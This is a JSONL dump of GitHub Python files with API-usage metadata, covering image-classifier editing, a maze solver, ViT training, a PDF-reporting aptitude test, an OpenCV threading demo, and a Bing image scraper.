+{"seq_id": "72557262247", "text": "import argparse\nimport collections\nimport torch\nimport numpy as np\nimport os, sys\n\nfrom test_CINIC10 import predict\nsys.path.insert(0, 'src')\nimport data_loader.data_loaders as module_data\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nfrom trainer.editor import Editor\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils import prepare_device, copy_file, read_lists, write_pickle\nfrom utils.edit_utils import prepare_edit_data\nfrom utils.analysis import knn\n\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\ndef main(config):\n logger = config.get_logger('train')\n assert config.config['method'] == 'edit', \"Invalid method '{}'. Must be 'edit'\".format(config.config['method'])\n K = config.config['editor']['K'] # for KNN\n save_dir = str(config.save_dir)\n\n # build model architecture, then print to console\n config.config['arch'].update()\n layernum = config.config['layernum']\n model = config.init_obj('arch', module_arch, layernum=layernum)\n\n\n logger.info(\"Created {} model with {} trainable parameters\".format(config.config['arch']['type'], model.get_n_params()))\n if model.get_checkpoint_path() != \"\":\n logger.info(\"Restored weights from {}\".format(model.get_checkpoint_path()))\n else:\n logger.info(\"Training from scratch.\")\n\n # Create test data loader for metric calculations\n test_data_loader = config.init_obj('data_loader', module_data, split='test')\n logger.info(\"Created test data loader\")\n\n # Prepare for (multi-device) GPU training\n device, device_ids = prepare_device(config['n_gpu'])\n model = model.to(device)\n if len(device_ids) > 1:\n model = torch.nn.DataParallel(model, device_ids=device_ids)\n model.eval() # model should always be in eval() for editing\n\n # Get function handles for loss and metrics\n loss_fn = getattr(module_loss, config['loss'])\n metric_fns = [getattr(module_metric, met) for met in config['metrics']]\n\n # Run initial accuracy check on unedited model\n pre_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log pre-edit results and save to torch file\n logger.info(\"Metrics before editing: {}\".format(pre_edit_log))\n metric_save_path = os.path.join(save_dir, \"pre_edit_test_metrics.pth\")\n torch.save(pre_edit_log, metric_save_path)\n # write_pickle(pickle_path, pre_edit_log)\n\n # Prepare data for edit\n key_image_path = config.config['editor']['key_image_path']\n key_image_paths = read_lists(key_image_path)\n value_image_path = config.config['editor']['value_image_path']\n value_image_paths = read_lists(value_image_path)\n mask_path = config.config['editor']['mask_path']\n\n\n if mask_path != \"\":\n mask_paths = read_lists(mask_path)\n else:\n mask_paths = None\n\n logger.info(\"Key images: {}\".format(key_image_paths))\n logger.info(\"Value images: {}\".format(value_image_paths))\n logger.info(\"Masks: {}\".format(mask_paths))\n\n edit_data = prepare_edit_data(\n key_image_paths=key_image_paths,\n value_image_paths=value_image_paths,\n mask_paths=mask_paths,\n image_size=(32, 32))\n logger.info(\"Prepared data for editing\")\n\n if K > 0:\n # Provide dataloader to perform KNN\n val_paths_data_loader = config.init_obj(\n 'data_loader',\n module_data,\n split='valid',\n return_paths=True)\n 
logger.info(\"Created validation data loader for KNN calculations\")\n # Concatenate key and value images together\n # First is keys, second is values\n # labels of 'modified_imgs' and 'imgs' are misleading but from the original Editing a Classifier repo\n anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n pre_edit_knn_save_path = os.path.join(save_dir, \"pre_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=pre_edit_knn_save_path)\n logger.info(\"Saving pre-edit KNN results with K={} to {}\".format(K, pre_edit_knn_save_path))\n\n\n # Always use the dummy val_data_loader for covariance calculation\n covariance_data_loader_path = \"data/cinic-10-imagenet-dummy\"\n val_data_loader = module_data.CINIC10DataLoader(\n data_dir=covariance_data_loader_path,\n batch_size=256,\n shuffle=False,\n normalize=False,\n num_workers=8,\n split='valid')\n logger.info(\"Created dataloader for covariance matrix from {} ({})\".format(covariance_data_loader_path, 'valid'))\n\n\n\n # Set up editor\n editor_args = config.config['editor']['args']\n editor_args['arch'] = config.config['arch']['args']['type']\n\n editor = Editor(\n # model=model,\n val_data_loader=val_data_loader,\n **editor_args)\n\n # Create path for caching directory based on\n # (1) validation data dir\n # (2) context model -- architecture, layer number\n val_data_name = val_data_loader.get_data_name()\n model_arch = model.get_type()\n # layernum = editor.get_layernum()\n cache_dir = os.path.join('cache', val_data_name, \"{}-{}\".format(model_arch, layernum))\n logger.info(\"Looking for covariance matrix weights in {}\".format(cache_dir))\n # Perform edit\n editor.edit(\n edit_data=edit_data,\n model=model,\n cache_dir=cache_dir)\n\n model.save_model(save_path=os.path.join(config._save_dir, \"edited_model.pth\"))\n # Evaluate again on test set\n logger.info(\"Evaluating edited model on test set...\")\n post_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log post-edit results and save to torch file\n logger.info(\"Metrics after editing: {}\".format(post_edit_log))\n metric_save_path = os.path.join(save_dir, \"post_edit_test_metrics.pth\")\n torch.save(post_edit_log, metric_save_path)\n # write_pickle(pickle_path, post_edit_log)\n\n\n # Perform post edit KNN analysis\n if K > 0:\n # # Concatenate key and value images together\n # anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n post_edit_knn_save_path = os.path.join(save_dir, \"post_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=post_edit_knn_save_path)\n logger.info(\"Saving post-edit KNN results with K={} to {}\".format(K, post_edit_knn_save_path))\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', 
default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size'),\n CustomArgs(['--name'], type=str, target='name')\n ]\n parsed_args = args.parse_args()\n\n config = ConfigParser.from_args(args, options)\n main(config)\n", "repo_name": "allisonchen23/model-editing", "sub_path": "old_src/edit_knn.py", "file_name": "edit_knn.py", "file_ext": "py", "file_size_in_byte": 8243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 37, "usage_type": "name"}, {"api_name": "model.model", "line_number": 37, "usage_type": "argument"}, {"api_name": "model.loss.get_n_params", "line_number": 40, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 40, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 41, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 41, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 42, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 42, "usage_type": "name"}, {"api_name": "data_loader.data_loaders", "line_number": 47, "usage_type": "argument"}, {"api_name": "utils.prepare_device", "line_number": 51, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 52, "usage_type": "name"}, {"api_name": "model.loss.to", "line_number": 52, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.DataParallel", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "model.loss.eval", "line_number": 55, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 55, "usage_type": "name"}, {"api_name": "model.loss", "line_number": 58, "usage_type": "argument"}, {"api_name": "model.metric", "line_number": 59, "usage_type": "argument"}, {"api_name": "test_CINIC10.predict", "line_number": 62, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.edit_utils.prepare_edit_data", "line_number": 92, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 103, 
"usage_type": "argument"}, {"api_name": "torch.cat", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 113, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 116, "usage_type": "name"}, {"api_name": "data_loader.data_loaders.CINIC10DataLoader", "line_number": 126, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 126, "usage_type": "name"}, {"api_name": "trainer.editor.Editor", "line_number": 141, "usage_type": "call"}, {"api_name": "model.loss.get_type", "line_number": 150, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 157, "usage_type": "name"}, {"api_name": "model.loss.save_model", "line_number": 160, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "test_CINIC10.predict", "line_number": 163, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 183, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 186, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 195, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 204, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 212, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 212, "usage_type": "name"}]}
+{"seq_id": "11764670549", "text": "from Maze import Maze\nfrom datetime import datetime\nfrom queue import heappop, heappush, deque\n\nclass MazeSolverIDDFS():\n startT = datetime.now()\n def __init__(self,maze):\n self.maze = maze\n\n\n def IDDFS(self):\n \n start = self.maze.getCell(0, 0)\n goal = self.maze.getCell(self.maze.size-1, self.maze.size-1)\n prev_iter_visited, depth = [], 0\n while True:\n traced_path, visited = self.DLS(start, goal, depth)\n if traced_path or len(visited) == len(prev_iter_visited): return traced_path\n else: prev_iter_visited = visited; depth += 1\n \n\n def DLS(self, start, goal, limit=-1):\n \n found, fringe, visited, came_from = False, deque([(0, start)]), set([start]), {start: None}\n while not found and len(fringe):\n depth, current = fringe.pop()\n if current == goal: found = True; break\n if limit == -1 or depth < limit:\n for node in current.edges.values():\n if node not in visited:\n visited.add(node); fringe.append((depth + 1, node))\n came_from[node] = current\n if found: print(\"IDDFS total time run \",datetime.now()-self.startT,\" total expanded cells:\",len(visited)+1,\" optimum path lenght: \",self.maze.optimum); return came_from, visited\n else: return None, visited\n", "repo_name": "n6parmak/Maze-Generator-Solver", "sub_path": "MazeSolverIDDFS.py", "file_name": "MazeSolverIDDFS.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "queue.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}]}
+{"seq_id": "24410508495", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport os\nimport random\nfrom PIL import Image\nimport matplotlib.pyplot as plt\nfrom torch.utils.data import Dataset, DataLoader\nfrom pytorch_pretrained_vit import ViT\nfrom p1_dataset import p1_data\n\n# Set random seed for reproducibility\nmanualSeed = 0\nprint(\"Random Seed: \", manualSeed)\nrandom.seed(manualSeed)\ntorch.manual_seed(manualSeed)\n\nbatch_size = 8\nworkers = 2\nlr = 1e-5\nweight_decay = 1e-5\nnum_epochs = 30\nnum_classes = 37\n\n\nroot = 'hw3_data/p1_data'\nmodel_dir = './p1_models'\nos.makedirs(model_dir, exist_ok=True)\n\ntrain_dir = os.path.join(root, 'train')\nvalid_dir = os.path.join(root, 'val')\n\ntrain_tfm = transforms.Compose([\n transforms.RandomRotation(30), \n transforms.RandomResizedCrop(384, scale=(0.8, 1.0)),\n transforms.ColorJitter(brightness=0.3),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\ntest_tfm = transforms.Compose([\n transforms.Resize((384, 384)),\n transforms.ToTensor(),\n transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\n\n\ntrain_dataset = p1_data(train_dir, mode='train', transform=train_tfm)\nvalid_dataset = p1_data(valid_dir, mode='valid', transform=test_tfm)\n\n# Create the dataloader\ntrain_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, num_workers=workers)\nvalid_loader = DataLoader(valid_dataset, batch_size=batch_size, shuffle=False, num_workers=workers)\n\n# Decide which device we want to run on\ndevice = torch.device(\"cuda\" if (torch.cuda.is_available()) else \"cpu\")\n\nmodel = ViT('B_16_imagenet1k', pretrained=True, num_classes=num_classes)\nmodel = model.to(device)\nprint(model)\n\n# Initialize Loss function\ncriterion = nn.CrossEntropyLoss()\n\noptimizer = optim.Adam(model.parameters(), lr=lr, weight_decay=weight_decay)\n\n\n# Training Loop\ntrain_losses = []\n\nfor epoch in range(num_epochs):\n\n # ---------- Training ----------\n # Make sure the model is in train mode before training.\n model.train()\n\n # These are used to record information in training.\n train_loss = []\n train_accs = []\n\n # Iterate the training set by batches.\n for i, batch in enumerate(train_loader):\n \n # A batch consists of image data and corresponding labels.\n imgs, labels = batch\n labels = labels.long().to(device)\n \n # Forward the data. 
(Make sure data and model are on the same device.)\n logits = model(imgs.to(device))\n \n # Calculate the cross-entropy loss.\n # We don't need to apply softmax before computing cross-entropy as it is done automatically.\n loss = criterion(logits, labels)\n\n # Gradients stored in the parameters in the previous step should be cleared out first.\n optimizer.zero_grad()\n \n # Compute the gradients for parameters.\n loss.backward()\n \n # Update the parameters with computed gradients.\n optimizer.step()\n \n # Compute the accuracy for current batch.\n acc = (logits.argmax(dim=-1) == labels.to(device)).float().mean()\n \n # Record the loss and accuracy.\n train_loss.append(loss.item())\n train_accs.append(acc)\n\n # The average loss and accuracy of the training set is the average of the recorded values.\n train_loss = sum(train_loss) / len(train_loss)\n train_acc = sum(train_accs) / len(train_accs)\n train_losses.append(train_loss)\n # Print the information.\n print(f\"[{epoch+1:03d}/{num_epochs:03d}] loss = {train_loss:.5f}, acc = {train_acc:.5f}\")\n torch.save(model.state_dict(), os.path.join(model_dir, 'p1_model.pth'))\n\nplt.figure(figsize=(10,5))\nplt.title(\"Training Loss\")\nplt.plot(train_losses,label=\"train\")\nplt.xlabel(\"iterations\")\nplt.ylabel(\"Loss\")\nplt.legend()\nplt.savefig(\"./p1_Loss.png\")\n\n# Testing\nprint('Testing started!')\nmodel.eval()\ntest_hit = 0\nfor i, batch in enumerate(valid_loader):\n imgs, labels = batch\n with torch.no_grad():\n logits = model(imgs.to(device))\n\n test_hit += (logits.argmax(dim=-1) == labels.to(device)).sum()\n\ntest_acc = test_hit / len(valid_dataset)\nprint(f\"Testing Acc = {test_acc:.4f}\")\n", "repo_name": "yiwei32/NTU_courses", "sub_path": "2021_Fall/DLCV/hw3/p1_train.py", "file_name": "p1_train.py", "file_ext": "py", "file_size_in_byte": 4231, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "random.seed", "line_number": 16, "usage_type": "call"}, {"api_name": "torch.manual_seed", "line_number": 17, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "torchvision.transforms.Compose", "line_number": 34, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 34, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomRotation", "line_number": 35, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 35, "usage_type": "name"}, {"api_name": "torchvision.transforms.RandomResizedCrop", "line_number": 36, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 36, "usage_type": "name"}, {"api_name": "torchvision.transforms.ColorJitter", "line_number": 37, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 37, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 38, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 38, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 39, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 39, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", 
"line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "torchvision.transforms.Resize", "line_number": 42, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 42, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 43, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 43, "usage_type": "name"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 44, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 44, "usage_type": "name"}, {"api_name": "p1_dataset.p1_data", "line_number": 47, "usage_type": "call"}, {"api_name": "p1_dataset.p1_data", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pytorch_pretrained_vit.ViT", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 62, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 64, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 132, "usage_type": "call"}]}
+{"seq_id": "38143746710", "text": "from random import choice, choices, randint\r\nfrom datetime import datetime\r\nfrom json import load\r\nfrom fpdf import FPDF\r\n\r\n\r\ndef print_report_to_pdf(pdf, report):\r\n \"\"\" Function which writes the data from report in pdf file.\"\"\"\r\n table_cell_width = 30\r\n table_cell_height = 5\r\n pdf.set_font('Times', '', 10)\r\n column_names = report[0].keys()\r\n\r\n for column in column_names:\r\n pdf.cell(table_cell_width, table_cell_height, column, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n pdf.set_font('Times', '', 10)\r\n\r\n for line in report:\r\n for column in column_names:\r\n if line[\"Correct answer\"] != line[\"User choice\"]:\r\n pdf.set_font('Times', 'B', 10)\r\n if column == \"Correct answer\":\r\n pdf.set_text_color(0, 255, 0)\r\n elif column == \"User choice\":\r\n pdf.set_text_color(255, 0, 0)\r\n else:\r\n pdf.set_text_color(0, 0, 0)\r\n else:\r\n pdf.set_font('Times', '', 10)\r\n pdf.set_text_color(0, 0, 0)\r\n value = str(line[column])\r\n if column == 'Letters':\r\n table_cell_height = 5\r\n x = pdf.get_x()\r\n y = pdf.get_y()\r\n pdf.multi_cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.set_xy(x + table_cell_width, y)\r\n else:\r\n table_cell_height = 10\r\n pdf.cell(table_cell_width, table_cell_height, value, align='C', border=1)\r\n pdf.ln(table_cell_height)\r\n\r\n\r\nclass PerceptualSpeed:\r\n def __init__(self):\r\n with open('resources/letters.json') as letters_file:\r\n self.letters = load(letters_file)\r\n self.upper_row = []\r\n self.lower_row = []\r\n self.report = []\r\n self.questions = 0\r\n self.answer = 0\r\n self.user_answer = 0\r\n self.score = 0\r\n\r\n def choice_letters(self):\r\n \"\"\" Generate a pair of random letters.\"\"\"\r\n letter = choice(list(self.letters.keys()))\r\n letter_weights = [1 for _ in range(0, len(list(self.letters.keys())))]\r\n for character in self.letters[letter]:\r\n index = list(self.letters.keys()).index(character)\r\n letter_weights[index] += 19\r\n letter_weights[list(self.letters.keys()).index(letter)] += 34\r\n pair_letter = choices(list(self.letters.keys()), weights=letter_weights, k=1)\r\n # print(letter, pair_letter[0])\r\n return [letter, pair_letter[0]]\r\n\r\n def get_letters(self):\r\n \"\"\" Generate 4 pairs of letters. \"\"\"\r\n self.upper_row = []\r\n self.lower_row = []\r\n while len(self.upper_row) < 4:\r\n pair = self.choice_letters()\r\n if pair[0] not in self.upper_row and pair[1] not in self.lower_row:\r\n self.upper_row.append(pair[0])\r\n self.lower_row.append(pair[1])\r\n self.questions += 1\r\n if randint(0, 1) == 0:\r\n self.upper_row = [letter.upper() for letter in self.upper_row]\r\n else:\r\n self.lower_row = [letter.upper() for letter in self.lower_row]\r\n\r\n def find_answer(self):\r\n \"\"\" Find the number of matching letter pairs.\"\"\"\r\n self.answer = 0\r\n for index in range(4):\r\n if self.upper_row[index].lower() == self.lower_row[index].lower():\r\n self.answer += 1\r\n\r\n def check_answer(self, user_choice):\r\n \"\"\" Check if user has guessed the correct answer. 
It adds the exercise to the report.\"\"\"\r\n self.user_answer = user_choice\r\n self.add_report()\r\n if self.answer == self.user_answer:\r\n return True\r\n return False\r\n\r\n def add_report(self):\r\n \"\"\" Insert the question with the correct answer and the user's choice\r\n inside a report list.\r\n \"\"\"\r\n letters = f\"{self.upper_row[0]} {self.upper_row[1]} {self.upper_row[2]}\" \\\r\n f\" {self.upper_row[3]}\\n{self.lower_row[0]} {self.lower_row[1]}\" \\\r\n f\" {self.lower_row[2]} {self.lower_row[3]}\"\r\n self.report.append({\"Question No\": self.questions, \"Letters\": letters,\r\n \"Correct answer\": self.answer, \"User choice\": self.user_answer})\r\n\r\n def save_report(self):\r\n \"\"\" Saves the report of this test in a .pdf file. \"\"\"\r\n time_now = datetime.now()\r\n time_format = \"%d/%m/%Y %H:%M\"\r\n date_time = time_now.strftime(time_format)\r\n\r\n pdf = FPDF()\r\n pdf.add_page()\r\n pdf.set_font('Times', 'B', 16)\r\n pdf.cell(195, 10, 'PERCEPTUAL SPEED TEST REPORT', 0, 1, 'C')\r\n pdf.cell(195, 10, date_time, 0, 1, 'C')\r\n pdf.cell(195, 10, f\"Score: {self.score}/{self.questions - 1}\", 0, 1, 'C')\r\n pdf.ln(10)\r\n\r\n print_report_to_pdf(pdf, self.report)\r\n\r\n time_format = \"%H-%M_%d-%m-%Y\"\r\n date_time = time_now.strftime(time_format)\r\n pdf.output(f'reports/{date_time}_perceptual_speed_report.pdf', 'F')\r\n self.report.clear()\r\n", "repo_name": "DanielM24/GIA-Practice-Tests", "sub_path": "perceptual_speed.py", "file_name": "perceptual_speed.py", "file_ext": "py", "file_size_in_byte": 5106, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "53", "api": [{"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 59, "usage_type": "call"}, {"api_name": "random.choices", "line_number": 65, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 79, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 111, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 111, "usage_type": "name"}, {"api_name": "fpdf.FPDF", "line_number": 115, "usage_type": "call"}]}
+{"seq_id": "29719035240", "text": "\n\n\nimport threading\nimport cv2\nimport numpy as np\n\ndef sub(obj, ROI):\n np.copyto(ROI[:,:,0],obj.apply(ROI, None, -1))\n\nfgbg = cv2.createBackgroundSubtractorKNN(100, 500, False)\n\nthreadcount = 10\nthreads = []\ndata = []\n\nfor x in range(threadcount):\n data.append((255 * np.random.rand(320, 200, 1)).astype(dtype=\"uint8\"))\n threads.append(threading.Thread(target=sub, args=[fgbg, data[x]]))\n\n# Start them all\nfor thread in threads:\n thread.start()\n\n# Wait for all to complete\nfor thread in threads:\n thread.join()\n\nprint()\n\n\n", "repo_name": "janssenda/test-async-py", "sub_path": "complex-process.py", "file_name": "complex-process.py", "file_ext": "py", "file_size_in_byte": 537, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.copyto", "line_number": 9, "usage_type": "call"}, {"api_name": "cv2.createBackgroundSubtractorKNN", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random.rand", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 18, "usage_type": "attribute"}, {"api_name": "threading.Thread", "line_number": 19, "usage_type": "call"}]}
+{"seq_id": "36622721246", "text": "from bs4 import BeautifulSoup\nimport requests\nfrom PIL import Image\nfrom io import BytesIO\nimport os\n\ndef startSearch():\n ##Initialize the search\n search = input('Search for:')\n params = {'q': search}\n ##Replaces spaces with unnderscores for url search\n dir_name = search.replace(' ', '_').lower()\n ##If a directory with the search term doesnt exist, make a directory for it\n if not os.path.isdir(dir_name):\n os.makedirs(dir_name)\n ## Get the url plugging in the provided search term as the parameter\n r = requests.get('http://www.bing.com/images/search', params=params)\n # Intialize the HTML soup\n soup = BeautifulSoup(r.text, 'html.parser')\n ## Parse the soup for all a tags with a class of thumb\n links = soup.findAll('a', {'class': 'thumb'})\n\n for item in links:\n try:\n ## Get the link of each a tag\n img_obj = requests.get(item.attrs['href'])\n print(\"getting\", item.attrs['href'])\n title = item.attrs['href'].split('/')[-1]\n try:\n ## Get the image inside of the a tag\n img = Image.open(BytesIO(img_obj.content))\n ## Save that image in the directory\n img.save('./' + dir_name + '/' + title, img.format)\n except:\n print('could not save image')\n except:\n print(\"could not request Image\")\n startSearch()\n\n## Initialize the search by calling the function\nstartSearch()\n\n", "repo_name": "cirrusm/web-scraper", "sub_path": "images.py", "file_name": "images.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isdir", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 15, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 17, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 19, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 26, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 31, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 